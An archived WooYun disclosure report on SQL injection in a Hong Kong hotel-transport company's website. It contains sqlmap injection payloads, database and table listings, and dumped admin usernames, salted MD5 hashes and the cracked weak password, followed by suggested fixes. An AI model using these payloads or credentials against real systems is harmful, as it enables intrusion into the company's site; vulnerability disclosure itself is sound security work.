乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经确认,细节仅向厂商公开 2015-11-20: 细节向核心白帽子及相关领域专家公开 2015-11-30: 细节向普通白帽子公开 2015-12-10: 细节向实习白帽子公开 2015-12-25: 细节向公众公开
RT,環島旅運、環球汽車為冠忠巴士集團(上巿公司編號306)之附屬公司,分別於1973年及1968年成立。我們於酒店客運服務行業擁有領導地位,主要的客戶群包括香港大部份世界級的酒店。能夠維持與客戶們的長期合作關係,充份驗證了本公司的優良服務質素。
权重:
很简单的存在注入:
**.**.**.**/zh/servicedetails.php?id=13 (GET)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13' AND 8653=8653 AND 'XtRO'='XtRO Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=13' AND (SELECT * FROM (SELECT(SLEEP(5)))fKOs) AND 'UXBY'='UXBY Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-2618' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787171,0x4667494d4373704d6c6a,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windowsweb application technology: PHP 5.4.12, Apache 2.2.22back-end DBMS: MySQL 5.0.12available databases [5]:[*] information_schema[*] testtransisland[*] testtransisland_cn[*] testtransisland_en[*] transisland
到处瞅瞅:
Database: testtransisland[48 tables]+------------------------------------+| banner || bannernode || bannernode_seq || car || carnode || carnode_seq || carprice || contactus || faq || faqnode || faqnode_seq || hkexpress || link || linknode || linknode_seq || news || newsnode || newsnode_seq || otherairportbook || otherairportbooknode || otherairportbooknode_seq || park || parknode || parknode_seq || password || promotion || promotionnode || promotionnode_seq || route || routenode || routenode_seq || visitor_counter || visitor_counter_hk_visit_spot || visitor_counter_news || visitor_counter_pm || visitor_counter_service21 || visitor_counter_servicedetails_1 || visitor_counter_servicedetails_100 || visitor_counter_servicedetails_101 || visitor_counter_servicedetails_13 || visitor_counter_servicedetails_26 || visitor_counter_servicedetails_90 || visitor_counter_servicedetails_91 || visitor_counter_servicedetails_93 || visitor_counter_servicedetails_97 || visitor_counter_servicedetails_99 || visitor_counter_servicelist || visitor_counter_sz_visit_spot |+------------------------------------+
Database: transisland[31 tables]+--------------------------+| banner || bannernode || bannernode_seq || car || carnode || carnode_seq || carprice || contactus || faq || faqnode || faqnode_seq || link || linknode || linknode_seq || news || newsnode || newsnode_seq || otherairportbook || otherairportbooknode || otherairportbooknode_seq || park || parknode || parknode_seq || password || promotion || promotionnode || promotionnode_seq || route || routenode || routenode_seq || visitor_counter |+--------------------------+
数据较多哈,password表里面:
Database: transislandTable: password[1 entry]+-----------+----------------------------------+------+| loginName | password | salt |+-----------+----------------------------------+------+| admin | 9f104b4c3c4aa9bb8b31e5124dd8e1dd | 593 |+-----------+----------------------------------+------+
加盐方法:md5(md5(password)+salt),解除来后为admin admin,弱口令哈其他表里面也是一样:
Database: testtransislandTable: password[4 entries]+-----------+----------------------------------+------+| loginName | password | salt |+-----------+----------------------------------+------+| admin | 4f6679ced9c06ad18451ba14058c99a5 | 528 || tom | 4b62f5b372179ebae56ce8f192ab1c12 | 000 || tina | 4035c949c4df70d88635fe980c0a17f6 | 000 || calvin | 37096795fd55f1554568c880de099bd4 | 000 |+-----------+----------------------------------+------+
仅仅测试未深入= =
过滤参数;修改加密方式;修改弱口令
危害等级:中
漏洞Rank:8
确认时间:2015-11-10 15:26
已將事件通知有關機構
暂无